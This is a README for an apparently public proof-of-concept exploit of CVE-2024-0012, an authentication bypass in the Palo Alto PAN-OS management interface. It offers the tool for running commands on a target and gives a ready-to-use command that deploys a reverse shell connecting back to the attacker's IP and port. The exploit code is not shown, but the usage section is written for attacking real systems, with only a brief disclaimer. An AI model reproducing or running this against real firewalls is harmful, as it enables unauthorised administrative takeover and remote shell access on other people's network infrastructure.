
CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) RCE POC


0xjessie21/CVE-2024-0012

Python 3.x

CVE-2024-0012

CVE-2024-0012 is an authentication bypass in Palo Alto Networks PAN-OS software that enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities.


Disclaimer
This project is primarily built to be used as a standalone CLI tool. Running this exploit as a service may pose security risks. It is recommended to use it with caution and with additional security measures. DWYOR.

Usage

python3 cve-2024-0012.py -h

This will display help for the tool. Here are all the switches it supports.

Usage:
  python3 cve-2024-0012.py [flags]

Flags:
  -h, --help         show this help message and exit
  --url URL          Target base URL (http:// or https://)
  --no-verify        Disable SSL verification
  --timeout TIMEOUT  Request timeout in seconds
  --command COMMAND  Command to execute on the target
  --reverse-shell    Deploy a reverse shell to the target
  --lhost LHOST      Local host for reverse shell connection (required for reverse shell)
  --lport LPORT      Local port for reverse shell connection (required for reverse shell)

Reverse Shell Command.

python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
  • Replace 4444 with the port you are using.

Credits
